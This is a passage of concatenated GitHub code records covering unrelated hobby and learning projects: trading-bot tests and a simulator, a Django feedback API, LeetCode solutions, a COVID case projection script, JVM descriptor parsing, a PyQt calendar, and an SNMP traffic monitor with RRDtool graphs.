test_calculate_order_rate(self):\n market = 'BTC-LTC'\n quantity = 5\n order_type = 'buy'\n order_rate = self.bot.calculate_order_rate(market, order_type, quantity)\n assert(order_rate == 0.06)\n order_type = 'sell'\n order_rate = self.bot.calculate_order_rate(market, order_type, quantity)\n assert(order_rate == 0.05)\n\n def test_calculate_num_coins(self):\n self.bot.minor_tick_step()\n market = 'BTC-LTC'\n order_type = 'buy'\n quantity = 0.1\n num_coins = self.bot.calculate_num_coins(market, order_type, quantity)\n assert(num_coins == 6.46203554)\n order_type = 'sell'\n quantity = 1\n num_coins = self.bot.calculate_num_coins(market, order_type, quantity)\n assert (num_coins == 20)\n","repo_name":"t0p4/cryptobot","sub_path":"tests/crypto_bot_test.py","file_name":"crypto_bot_test.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"38421271155","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status, mixins, viewsets, permissions as drf_permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom . import models, serializers\nfrom order.services import add_files_to_obj\n\n\nclass FeedbackViewSet(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet):\n serializer_class = serializers.FeedbackSerializer\n permission_classes = (drf_permissions.IsAuthenticatedOrReadOnly,)\n queryset = models.FeedbackModel.objects.all()\n\n def get_serializer_class(self):\n if self.action == 'create':\n return serializers.CreateFeedbackSerializer\n if self.action == 'answer':\n return serializers.CreateAnswerSerializer\n else:\n return super().get_serializer_class()\n\n def create(self, request, *args, **kwargs):\n response = dict()\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n new_feedback = serializer.create(serializer.validated_data)\n new_feedback.author_user = request.user\n if request.data.get('files_url'):\n add_files_to_obj(new_feedback, request.data['files_url'])\n new_feedback.save()\n response.update(self.get_serializer(instance=new_feedback).data)\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def answer(self, request, *args, **kwargs):\n response = dict()\n try:\n feedback = models.FeedbackModel.objects.get(pk=kwargs['pk'])\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n new_answer = serializer.create(serializer.validated_data)\n new_answer.author = request.user\n if request.data.get('files_url'):\n add_files_to_obj(new_answer, request.data['files_url'])\n new_answer.save()\n feedback.answers.add(new_answer)\n response.update(self.get_serializer(instance=new_answer).data)\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n","repo_name":"MathewDyrin/jobbit-backend-preview","sub_path":"feedback/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17961790200","text":"''' 041 缺失的第一个正整数\n题目描述:给定一个未排序的整数数组,找出其中没有出现的最小的正整数。\n示例 1:\n输入: [1,2,0]\n输出: 3\n\n示例 
2:\n输入: [3,4,-1,1]\n输出: 2\n\n示例 3:\n输入: [7,8,9,11,12]\n输出: 1\n'''\nfrom typing import List\nclass Solution:\n #my way\n def firstMissingPositive01(self, nums: List[int]) -> int:\n nums_list = len(nums)\n if nums_list == 0:\n return 1\n i = 0\n while( i < nums_list ):\n if ( nums[i] < 0 ):\n nums.pop(i)\n nums_list -= 1\n else:\n i += 1\n array = [x+1 for x in range(nums_list)]\n res = -1;\n for j in array:\n if j not in nums:\n res = j\n return res\n else:\n continue; \n if res == -1:\n return nums_list+1 \n #others 桶排序\n #参考网址:https://leetcode-cn.com/problems/first-missing-positive/solution/tong-pai-xu-python-dai-ma-by-liweiwei1419/\n def firstMissingPositive02(self, nums: List[int]) -> int:\n for i in range(len(nums)):\n nums_len = len(nums)\n while ( nums[i] < nums_len and nums[i]>0 and nums[i]!=i+1 and ( i >0 and nums[i]!= nums[nums[i]-1]) ):\n temp = nums[nums[i]-1]\n nums[nums[i]-1] = nums[i] \n nums[i] = temp\n for i in range(len(nums)):\n if ( nums[i]!= i+1 ):\n return i+1\n return len(nums)+1 \n \na = Solution()\nprint(a.firstMissingPositive02([0,2,2,1,1]))","repo_name":"Qinpeng96/FindJob","sub_path":"编程/LeetCode/041firstMissingPositive.py","file_name":"041firstMissingPositive.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30451013742","text":"#!/usr/bin/python3.7\n\nimport psycopg2, datetime, sys\n\n\nvpais_sim = \"\"\nlinfectados = []\nvinfectados = 0\nlmuertes = []\nvmuertes = 0\nc = 1\nvahora = datetime.datetime.now()\nvhora = vahora.strftime(\"%H:%M\")\n\n\nprint(\"Simulacion de avance diario segun avance de otro pais.\")\nvpais_sim = input (\"Con que pais desea simular: \")\n\n# Genero la conexion con la base.\nconn = psycopg2.connect(\n host = \"localhost\",\n database=\"raspi\",\n user=\"pi\",\n password=\"Software26\"\n)\n\n# Creo el cursor.\ncur = conn.cursor()\n\ncur.execute(\"select fecha, infectados, muertes from covid19 where pais = %s order by fecha desc\", (vpais_sim,) )\n\nrows = cur.fetchall()\n\nnum_rows = cur.rowcount\n\nif num_rows < 1:\n print (\"No se encontro el pais \",vpais_sim)\n # Cierro el cursor y le coneccion a la base.\n cur.close()\n conn.close()\n sys.exit(1)\n \nfor reg in rows:\n\n #print (c)\n #sys.stdout.write(\"Registro: %d%% \\r\" % (c) )\n #sys.stdout.flush()\n \n if c > 1:\n \n linfectados.append(vinfectados - reg[1])\n vinfectados = reg[1]\n \n lmuertes.append(vmuertes - reg[2])\n vmuertes = reg[2]\n \n \n else:\n \n # Si es el primer registro carga el valor en la variable.\n vinfectados = reg[1]\n vmuertes = reg[2]\n \n c = c + 1\n \n \npromedio_infectados = int ((sum(linfectados)/len(linfectados)))\npromedio_muertes = int((sum(lmuertes)/len(lmuertes)))\n \nprint (\"Promedio de infectados por hora para \",vpais_sim,\": \",promedio_infectados)\n\n# Obtengo el ultimo valor de Argentina\n\ncur.execute(\"select fecha, infectados, muertes from covid19 where pais = 'Argentina' order by fecha desc LIMIT 1\")\n\nrows = cur.fetchall()\n\nfor reg in rows:\n \n varg_infectados = reg[1]\n varg_muertes = reg[2]\n\n# Simula por las proximas 48 horas.\nfor hora in range(48):\n #print (\" HORA INFECTADOS MUERTES\")\n #print (\" \", vhora, \" \",varg_infectados+promedio_infectados, \" \",varg_muertes + promedio_muertes)\n print (\" HORA INFECTADOS\")\n print (\" \", vhora, \" \",varg_infectados+promedio_infectados)\n\n varg_infectados = varg_infectados+promedio_infectados\n varg_muertes = varg_muertes + promedio_muertes\n vahora = vahora + 
datetime.timedelta(hours=1)\n vhora = vahora.strftime(\"%H:%M\")\n\n# Cierro el cursor y le coneccion a la base.\ncur.close()\nconn.close()","repo_name":"hconosciuto/covid19","sub_path":"simulaciones/simulacion_pais.py","file_name":"simulacion_pais.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27495292712","text":"def solution(m):\n if len(m) == 0 or len(m[0]) == 0:\n return -1 # impossible\n\n matrix = [row[:] for row in m]\n nrow, ncol = len(matrix), len(matrix[0])\n\n q = deque([((0, 0), 0)]) # ((x, y), step)\n matrix[0][0] = \"D\"\n while q:\n (x, y), step = q.popleft()\n\n for dx, dy in [[0, 1], [0, -1], [1, 0], [-1, 0]]:\n if 0 <= x+dx < nrow and 0 <= y+dy < ncol:\n if matrix[x+dx][y+dy] == \"X\":\n return step+1\n elif matrix[x+dx][y+dy] == \"O\":\n # mark visited\n matrix[x + dx][y + dy] = \"D\"\n q.append(((x+dx, y+dy), step+1))\n\n return -1","repo_name":"workprinond/DS_-_Algo_TechInterview_Practise","sub_path":"Beginning/treasureisland1_1.py","file_name":"treasureisland1_1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35706684492","text":"from .verifier_types import T_ARRAY, T_BOOL, T_BYTE, T_CHAR, T_DOUBLE, T_FLOAT, T_INT, T_INVALID, T_LONG, T_OBJECT, T_SHORT, unSynthesizeType\n\n_cat2tops = T_LONG, T_DOUBLE\n\ndef parseFieldDescriptors(desc_str, unsynthesize=True):\n baseTypes = {'B':T_BYTE, 'C':T_CHAR, 'D':T_DOUBLE, 'F':T_FLOAT,\n 'I':T_INT, 'J':T_LONG, 'S':T_SHORT, 'Z':T_BOOL}\n\n fields = []\n while desc_str:\n oldlen = len(desc_str)\n desc_str = desc_str.lstrip('[')\n dim = oldlen - len(desc_str)\n if dim > 255:\n raise ValueError('Dimension {} > 255 in descriptor'.format(dim))\n if not desc_str:\n raise ValueError('Descriptor contains [s at end of string')\n\n if desc_str[0] == 'L':\n end = desc_str.find(';')\n if end == -1:\n raise ValueError('Unmatched L in descriptor')\n\n name = desc_str[1:end]\n desc_str = desc_str[end+1:]\n baset = T_OBJECT(name)\n else:\n if desc_str[0] not in baseTypes:\n raise ValueError('Unrecognized code {} in descriptor'.format(desc_str[0]))\n baset = baseTypes[desc_str[0]]\n desc_str = desc_str[1:]\n\n if dim:\n # Hotspot considers byte[] and bool[] identical for type checking purposes\n if unsynthesize and baset == T_BOOL:\n baset = T_BYTE\n baset = T_ARRAY(baset, dim)\n elif unsynthesize:\n # synthetics are only meaningful as basetype of an array\n # if they are by themselves, convert to int.\n baset = unSynthesizeType(baset)\n\n fields.append(baset)\n if baset in _cat2tops:\n fields.append(T_INVALID)\n return fields\n\n# get a single descriptor\ndef parseFieldDescriptor(desc_str, unsynthesize=True):\n rval = parseFieldDescriptors(desc_str, unsynthesize)\n\n cat = 2 if (rval and rval[0] in _cat2tops) else 1\n if len(rval) != cat:\n raise ValueError('Incorrect number of fields in descriptor, expected {} but found {}'.format(cat, len(rval)))\n return rval\n\n# Parse a string to get a Java Method Descriptor\ndef parseMethodDescriptor(desc_str, unsynthesize=True):\n if not desc_str.startswith('('):\n raise ValueError('Method descriptor does not start with (')\n\n # we need to split apart the argument list and return value\n # this is greatly complicated by the fact that ) is a legal\n # character that can appear in class names\n\n lp_pos = desc_str.rfind(')') # this case will work if return type is not an object\n if 
desc_str.endswith(';'):\n lbound = max(desc_str.rfind(';', 1, -1), 1)\n lp_pos = desc_str.find(')', lbound, -1)\n if lp_pos < 0 or desc_str[lp_pos] != ')':\n raise ValueError('Unable to split method descriptor into arguments and return type')\n\n arg_str = desc_str[1:lp_pos]\n rval_str = desc_str[lp_pos+1:]\n\n args = parseFieldDescriptors(arg_str, unsynthesize)\n rval = [] if rval_str == 'V' else parseFieldDescriptor(rval_str, unsynthesize)\n return args, rval\n\n# Adds self argument for nonstatic. Constructors must be handled seperately\ndef parseUnboundMethodDescriptor(desc_str, target, isstatic):\n args, rval = parseMethodDescriptor(desc_str)\n if not isstatic:\n args = [T_OBJECT(target)] + args\n return args, rval\n","repo_name":"xtiankisutsa/MARA_Framework","sub_path":"tools/decompilers/Krakatau/Krakatau/verifier/descriptors.py","file_name":"descriptors.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":602,"dataset":"github-code","pt":"47"} +{"seq_id":"35320650720","text":"'''\nfor tick level simulation.\n'''\n\n\n\nclass Account2:\n def __init__(self):\n self.__initialize_order()\n self.__initialize_holding()\n\n self.base_margin_rate = 1.2\n self.leverage = 15.0\n self.slip_page = 500\n self.force_loss_cut_rate = 0.5\n self.initial_asset = 5000\n self.order_cancel_delay = 3\n self.prediction_delay = 3\n\n self.total_pl = 0\n self.realized_pl = 0\n self.current_pl = 0\n self.num_trade = 0\n self.num_win = 0\n self.win_rate = 0\n self.asset = self.initial_asset\n\n self.total_pl_log = []\n self.predicton_log=[]\n self.action_log = []\n self.i_log = []\n self.action_log = {}\n self.log = []\n self.action_log_num = 0\n\n\n def __initialize_order(self):\n self.order_side = ''\n self.order_price = 0\n self.order_size = 0\n self.order_i = 0\n self.order_dt = ''\n self.order_type = ''\n self.order_cancel = False\n self.order_expire = 0\n\n def __initialize_holding(self):\n self.holding_side = ''\n self.holding_price = 0\n self.holding_size = 0\n self.holding_i = 0\n self.holding_dt = ''\n\n\n def move_to_next(self, i, price):\n self.__check_loss_cut(i,price)\n self.__check_execution(i,price)\n self.__check_cancel(i)\n if self.order_side != '':\n self.current_pl = (price - self.holding_price) * self.holding_size if self.holding_side == 'buy' else (self.holding_price - price) * self.holding_size\n else:\n self.current_pl = 0\n self.total_pl = self.realized_pl + self.current_pl\n self.total_pl_log.append(self.total_pl)\n self.asset = self.initial_asset + self.total_pl\n self.__add_action_log('i:'+str(i)+'order='+self.order_side+', '+str(self.order_size)+' @'+str(self.order_price),i)\n if self.holding_side !='':\n print('i={},posi={},posi price={},posi size={},order side={},order price={},order size={},pl={},realize pl={},current pl={}'\n .format(i,self.holding_side,self.holding_price,self.holding_size,self.order_side,self.order_price,self.order_size,self.total_pl,self.realized_pl,self.current_pl))\n\n def last_day_operation(self,i, price):\n self.__check_loss_cut( i,price)\n self.__check_execution( i,price)\n self.__check_cancel( i)\n if self.holding_side != '':\n if self.order_side != '':\n self.current_pl = (price - self.holding_price) * self.holding_size if self.holding_side == 'buy' else (self.holding_price -price) * self.holding_size\n else:\n self.current_pl = 0\n self.total_pl = self.realized_pl + self.current_pl\n self.total_pl_log.append(self.total_pl)\n if self.num_trade > 0:\n self.win_rate = self.num_win / 
self.num_trade\n\n\n def entry_order(self, side, price, size, type, expire, i):\n if self.order_side =='':\n self.order_side = side\n self.order_price = price\n self.order_size =size\n self.order_i = i\n self.order_type = type #limit, market\n self.order_cancel = False\n self.order_expire = expire\n else:\n print('order is already exist!')\n\n\n def cancel_order(self, i):\n if self.order_type != 'losscut':\n self.order_cancel = True\n self.order_i = i\n\n def __check_cancel(self,i):\n if self.order_cancel:\n if i - self.order_i >= self.order_cancel_delay:\n self.__add_action_log('order cancelled.',i)\n self.log.append('order cancelled.')\n self.__initialize_order()\n\n def __check_expiration(self,i):\n if i - self.order_i >= self.order_expire and self.order_type != 'market' and self.order_type != 'losscut':\n self.__add_action_log('order expired.', i)\n self.log.append('order expired.')\n self.__initialize_order()\n\n def __check_execution(self, i, price):\n if i - self.order_i >= self.order_cancel_delay and self.order_side !='':\n if self.order_type == 'market' or self.order_type == 'losscut':\n self.__process_execution(price,i)\n self.__initialize_order()\n elif self.order_type == 'limit' and ((self.order_side == 'buy' and self.order_price >= price) or (self.order_side == 'sell' and self.order_price <= price)):\n self.__process_execution(self.order_price,i)\n self.__initialize_order()\n elif self.order_type != 'market' and self.order_type != 'limit' and self.order_type != 'losscut':\n print('Invalid order type!' + self.order_type)\n\n def __process_execution(self, price, i):\n if self.order_side != '':\n if self.holding_side == '': # no position\n self.holding_side = self.order_side\n self.holding_price = price\n self.holding_size = self.order_size\n self.holding_i = self.order_i\n else:\n if self.holding_side == self.order_side: # order side and position side is matched\n self.holding_price = round(((self.holding_price * self.holding_size) + (price * self.order_size)) / (self.order_size + self.holding_size))\n self.holding_size += self.order_size\n self.holding_i = i\n elif self.holding_size > self.order_size: # side is not matched and holding size > order size\n self.__calc_executed_pl(price, i)\n self.holding_size -= self.order_size\n #self.realized_pl = (price - self.holding_price) * self.order_size if self.holding_side == 'buy' else (self.holding_price - price) * self.order_size\n elif self.holding_size == self.order_size:\n self.__calc_executed_pl(price, i)\n self.__initialize_holding()\n else: # in case order size is bigger than holding size\n self.__calc_executed_pl(price, i)\n self.holding_side = self.order_side\n self.holding_size = self.order_size - self.holding_size\n self.holding_price = price\n self.holding_i = i\n\n\n\n def __calc_executed_pl(self,price,i): #assume all order size was executed\n pl = (price - self.holding_price) * self.order_size if self.holding_side == 'buy' else (self.holding_price - price) * self.order_size\n self.realized_pl += round(pl)\n self.num_trade += 1\n if pl >0:\n self.num_win +=1\n\n def __check_loss_cut(self, i, price):\n if self.holding_side != '' and self.order_type !='losscut':\n req_collateral = self.holding_size * price / self.leverage\n pl = price - self.holding_price if self.holding_side == 'buy' else self.holding_price - price\n pl = pl * self.holding_size\n margin_rate = (self.initial_asset + self.realized_pl + pl) / req_collateral\n if margin_rate <= self.force_loss_cut_rate:\n self.__add_action_log(\"Loss cut postion! 
margin_rate=\" + str(margin_rate),i)\n self.log.append(\"Loss cut postion! margin_rate=\" + str(margin_rate))\n self.__force_exit(i)\n\n def __force_exit(self, i):\n self.order_side = 'buy' if self.holding_side == 'sell' else 'sell'\n self.order_size = self.holding_size\n self.order_type = 'losscut'\n self.order_i = i\n\n def __add_action_log(self, log, i):\n self.action_log[str(i)+'-'+str(self.action_log_num)] = log\n self.action_log_num += 1\n self.i_log.append(i)\n","repo_name":"alunfes/btc-bot2","sub_path":"Account2.py","file_name":"Account2.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9340837855","text":"import sys\n\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(\"Calender\")\n self.setGeometry(50, 50, 500, 300)\n layout = QGridLayout()\n self.setLayout(layout)\n self.calender = QCalendarWidget()\n self.calender.setGridVisible(True)\n self.calender.setNavigationBarVisible(True)\n self.calender.selectionChanged.connect(self.handle_selection)\n layout.addWidget(self.calender, 0, 0)\n\n def handle_selection(self):\n selected = self.calender.selectedDate()\n print(selected.toString(\"yyyy-MM-dd\"))\n\n\napp = QApplication(sys.argv)\n\n\ndef main():\n window = Window()\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shoukreytom/Python","sub_path":"gui/pyqt/Calender.py","file_name":"Calender.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1794126326","text":"# from GetSNMP import *\nfrom pysnmp.hlapi import *\nimport rrdtool\nfrom time import *\nimport json\nimport os\nimport threading\nfrom reportlab.pdfgen import canvas\n\n\nclass Agente:\n\n def __init__(self,comunidad:str,host:str):\n self.Comunidad=comunidad\n self.Host=host\n self.Nombre_sistema=None\n # Version y logo del sistema operativo (lo ponemos nosotros)\n # Ubicacion geografica \n self.Num_interfaces=None\n self.Tiempo_Activo=None\n self.Lista_Consultas=[0,0,0,0,0]\n # Creando carpeta para almacenar las bases de datos generadas\n\n try:\n os.mkdir(self.Host)\n except:\n pass\n\n def status(self)->bool:\n try:\n self.Nombre_sistema=self.consultaSNMP(\"1.3.6.1.2.1.1.1.0\")\n # Version y logo del sistema operativo (lo ponemos nosotros)\n # Ubicacion geografica \n self.Num_interfaces=self.consultaSNMP(\"1.3.6.1.2.1.2.1.0\") \n self.Tiempo_Activo=self.consultaSNMP(\"1.3.6.1.2.1.1.3.0\") \n print(\"|==============================|\\nComunidad:\",self.Comunidad)\n print(\"Host:\",self.Host)\n print(\"Nombre del sistema:\",self.Nombre_sistema)\n print(\"Numero de interfaces de red:\",self.Num_interfaces)\n print(\"Tiempo desde el ultimo reinicio:\",self.Tiempo_Activo,\"Segs\")\n return True\n except :\n print(\"Error en status\")\n return False\n \n\n def analisis(self):\n self.creaBases() #creo mis bases\n inicio=time()\n fin= inicio + 690# 16 minutos\n while True:\n print(self.updateListaConsultas())\n inicio=time()\n if not inicio < fin:\n break\n self.creaGraficas()\n\n def creaBases(self):\n self.nuevaRDD(\"multicast.rrd\")\n self.nuevaRDD(\"ipv4.rrd\")\n self.nuevaRDD(\"icmp.rrd\")\n self.nuevaRDD(\"octets.rrd\")\n self.nuevaRDD(\"ports.rrd\")\n\n #ciclo update\n def creaGraficas(self):\n self.nuevaGrafica(\"multicast.png\",'multicast.rrd')\n 
self.nuevaGrafica(\"ipv4.png\",'ipv4.rrd')\n self.nuevaGrafica(\"icmp.png\",'icmp.rrd')\n self.nuevaGrafica(\"octets.png\",'octets.rrd')\n self.nuevaGrafica(\"ports.png\",'ports.rrd')\n\n def updateListaConsultas(self)->list:\n #str_mib=\"1.3.6.1.2.1.\"\n \n # print(\"2) Paquetes multicast que ha recibido una interfaz (ifInNUcastPkts) 1.3.6.1.2.1.2.2.1.12.1 counter\")\n self.Lista_Consultas[0] = self.consultaSNMP(\"1.3.6.1.2.1.2.2.1.12.1\")\n rrdtool.update(self.Host+'/multicast.rrd', \"N:\" + self.Lista_Consultas[0])\n rrdtool.dump(self.Host+'/multicast.rrd',self.Host+'/multicast.xml')\n\n # print(\"2) Paquetes recibidos exitosamente, entregados a protocolos IPv4. (ipInDelivers) 1.3.6.1.2.1.4.9.0 counter\")\n self.Lista_Consultas[1] = self.consultaSNMP(\"1.3.6.1.2.1.4.9.0\")\n rrdtool.update(self.Host+'/ipv4.rrd', \"N:\" + self.Lista_Consultas[1])\n rrdtool.dump(self.Host+'/ipv4.rrd',self.Host+'/ipv4.xml')\n\n # print(\"2) Mensajes de respuesta ICMP que ha enviado el agente (icmpOutEchoReps) 1.3.6.1.2.1.5.22.0 counter\")\n self.Lista_Consultas[2] = self.consultaSNMP(\"1.3.6.1.2.1.5.22.0\")\n rrdtool.update(self.Host+'/icmp.rrd', \"N:\" + self.Lista_Consultas[2])\n rrdtool.dump(self.Host+'/icmp.rrd',self.Host+'/icmp.xml')\n\n # print(\"2) Segmentos enviados, incluyendo los de las conexiones actuales, \",\n # \"pero excluyendo los que contienen solamente octetos retransmitidos (ifOutOctets) 1.3.6.1.2.1.2.2.1.16.1 counter\")\n self.Lista_Consultas[3] = self.consultaSNMP(\"1.3.6.1.2.1.2.2.1.16.1\")\n rrdtool.update(self.Host+'/octets.rrd', \"N:\" + self.Lista_Consultas[3])\n rrdtool.dump(self.Host+'/octets.rrd',self.Host+'/octets.xml')\n\n # print(\"D2) Datagramas recibidos que no pudieron ser entregados por cuestiones \",\n # \"distintas a la falta de aplicación en el puerto destino (udpNoPorts) 1.3.6.1.2.1.7.2.0 counter\")\n self.Lista_Consultas[4] = self.consultaSNMP(\"1.3.6.1.2.1.7.2.0\")\n rrdtool.update(self.Host+'/ports.rrd', \"N:\" + self.Lista_Consultas[4])\n rrdtool.dump(self.Host+'/ports.rrd',self.Host+'/ports.xml')\n\n return self.Lista_Consultas\n\n def consultaSNMP(self,oid:str):\n errorIndication, errorStatus, errorIndex, varBinds = next(\n # hace la solicitud getsnmp\n getCmd(SnmpEngine(),\n CommunityData(self.Comunidad),\n UdpTransportTarget((self.Host, 161)), # udp\n ContextData(),\n ObjectType(ObjectIdentity(oid)))) \n\n # tratamiento de errores\n if errorIndication:\n print(errorIndication)\n elif errorStatus:\n print('%s at %s' % (errorStatus.prettyPrint(),errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))\n else:\n for varBind in varBinds:\n varB=(' = '.join([x.prettyPrint() for x in varBind]))\n # print(varB)\n resultado= varB.split()[2] # se agarra la ultima parte de la consulta\n return resultado\n\n def nuevaRDD(self,nombreRRD:str):\n # creamos la bae de datos\n ret = rrdtool.create(self.Host+\"/\"+nombreRRD,\n \"--start\", # momento que se empieza a almacenar los datos\n 'N',# now (empieza al momento de ejecutar el script) (tambien un numero)\n \"--step\", # un step\n '30', # cada minuto\n #DS: Octetos de entrada : Tipo contador : cada dos minutos : sin limites minumos : sin limites maximos\n \"DS:octets:COUNTER:30:U:U\",\n #RRA: Cada 60 segs de hace un AVERAGE: la mitad de muestras se validan: cada 1 step : numero de filas en la base de datos\n \"RRA:AVERAGE:0.5:1:32\") #32 filas,cada uno de 30 segs\n\n #en caso de haber un error lo sabremos\n if ret:\n print (rrdtool.error())\n\n def nuevaGrafica(self,nombre_grafica:str,base_RRD:str):\n # tiempo actual\n 
tiempo_actual = int(time())\n        # graph from the current time minus the analysis window\n        tiempo_inicial = tiempo_actual - 690 # 690 s, the duration of the analysis\n        # a single graph is generated from the network traffic\n        ret = rrdtool.graph( self.Host+\"/\"+nombre_grafica,\n                    \"--start\",str(tiempo_inicial),\n                    \"--end\",\"N\",\n                    \"--vertical-label=Bytes/s\", # cosmetic graph option\n                    \"--title=\"+nombre_grafica, # cosmetic graph option\n                    # fetch the data to be plotted\n                    \"DEF:trafico=\"+self.Host+\"/\"+base_RRD+\":octets:AVERAGE\",\n                    # scale the whole series from octets to bits\n                    \"CDEF:escalaIn=trafico,8,*\",\n                    # draw the data\n                    \"LINE3:escalaIn#00FF00:Trafico de entrada\")\n\n    def __eq__(self, agente):\n        return self.Host==agente.Host\n\n    def reporte(self):\n        c=canvas.Canvas(self.Host+\"/\"+self.Host+\"_report.pdf\")\n        \n        c.drawString(170, 780, \"Reporte de trafico hecho por Cruz villalba Edwin Benrardo\")\n\n        datos_principales= (\"Comunidad:\"+self.Comunidad+\"\\n\",\n                \"Host:\"+self.Host+\"\\n\",\n                \"Nombre del sistema:\"+self.Nombre_sistema+\"\\n\",\n                \"Numero de interfaces:\"+self.Num_interfaces+\"\\n\",\n                \"Tiempo activo:\"+self.Tiempo_Activo)\n        texto=c.beginText(70,760)\n        texto.textLines(datos_principales)\n        c.drawImage(self.Host+\"/icmp.png\", 30, 550, width=250, height=100)\n        c.drawImage(self.Host+\"/ipv4.png\", 30, 450, width=250, height=100)\n        c.drawImage(self.Host+\"/multicast.png\", 290, 550, width=250, height=100)\n        c.drawImage(self.Host+\"/octets.png\", 290, 450, width=250, height=100)\n        c.drawImage(self.Host+\"/ports.png\", 150,350, width=250, height=100)\n        c.drawText(texto)\n        c.save()\n\n\n    # def __del__(self):\n    #     os.rmdir(self.Host)\n\nclass Agentes:\n    def __init__(self,comunidad:str):\n        self.temp_list=[]\n        self.agentes=[]\n        self.Comunidad=comunidad\n        with open(\"agentes.json\",'r') as temp_file:\n            self.temp_list=json.load(temp_file)\n        print(\"Agentes actuales\",self.temp_list)\n        for host in self.temp_list:\n            self.agentes.append(Agente(self.Comunidad,host))\n\n\n    def agregar(self,host:str):\n        nuevo=Agente(self.Comunidad,host)\n        if nuevo.status():\n            self.temp_list.append(host)\n            self.agentes.append(nuevo)\n            self.actualizar()\n            return True\n        else:\n            del nuevo\n            return False\n\n    def eliminar(self,host:str):\n        nuevo=Agente(self.Comunidad,host)\n        if nuevo.status():\n            self.temp_list.remove(host)\n            self.agentes.remove(nuevo)\n            self.actualizar()\n            return True\n        else:\n            return False\n\n    def actualizar(self):\n        with open(\"agentes.json\",'w') as temp_file:\n            json.dump(self.temp_list,temp_file)\n    \n    def trafico(self):\n        list_hilos=[]\n        for index,agente in zip(range(0,len(self.agentes)),self.agentes):\n            list_hilos.append(threading.Thread(target=agente.analisis))\n            list_hilos[index].start()\n\n    def reportes(self):\n        for agente in self.agentes:\n            agente.reporte()\n    \n    \n    def status(self):\n        for agente in self.agentes:\n            agente.status()\n\n\nif __name__=='__main__':\n\n    comunidad=\"123\"\n    agentes=Agentes(comunidad)\n    \n    opcion=0\n    while True:\n        os.system(\"clear\")\n        print(agentes.temp_list)\n        agentes.status()\n        print(\"|==============================|\")\n        print(\"Menu:\\n1)Alta.\\n2)Baja.\\n3)Trafico.\\n4)Generar reporte\\n5)Salir\\n\")\n        opcion=int(input(\"Escriba la opcion: \"))\n        if opcion==1:\n            nuevo_host=input(\"Escriba un host valido: \")\n            if agentes.agregar(nuevo_host):\n                print(\"Agregado.\")\n            else:\n                print(\"No se encontro el agente.\")\n            sleep(3)\n        elif opcion==2:\n            
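# option 2 removes an agent; Agentes.eliminar() also rewrites agentes.json through actualizar()\n            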
fuera_host=input(\"Escriba el host a eliminar: \")\n if agentes.eliminar(fuera_host):\n print(\"Eliminado\")\n else:\n print(\"No se encontro el agente a eliminar.\") \n sleep(3)\n elif opcion==3:\n print(\"Espere 16 min para que se llene la base de datos...\")\n agentes.trafico()\n sleep(2)\n elif opcion==4:\n print(\"Generando reportes... Espere\")\n agentes.reportes()\n sleep(2)\n elif opcion==5:\n break\n else:\n continue\n \n","repo_name":"edwbcruzv/Admin_de_Redes","sub_path":"Practica1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24539216736","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.annotated_doc_category import AnnotatedDocCategory\n from ..models.annotated_doc_sentence_metadata import AnnotatedDocSentenceMetadata\n\n\nT = TypeVar(\"T\", bound=\"AnnotatedDocSentence\")\n\n\n@attr.s(auto_attribs=True)\nclass AnnotatedDocSentence:\n \"\"\"\n Attributes:\n end (int):\n start (int):\n categories (Union[Unset, List['AnnotatedDocCategory']]):\n metadata (Union[Unset, AnnotatedDocSentenceMetadata]):\n \"\"\"\n\n end: int\n start: int\n categories: Union[Unset, List[\"AnnotatedDocCategory\"]] = UNSET\n metadata: Union[Unset, \"AnnotatedDocSentenceMetadata\"] = UNSET\n\n def to_dict(self) -> Dict[str, Any]:\n end = self.end\n start = self.start\n categories: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.categories, Unset):\n categories = []\n for categories_item_data in self.categories:\n categories_item = categories_item_data.to_dict()\n\n categories.append(categories_item)\n\n metadata: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.metadata, Unset):\n metadata = self.metadata.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(\n {\n \"end\": end,\n \"start\": start,\n }\n )\n if categories is not UNSET:\n 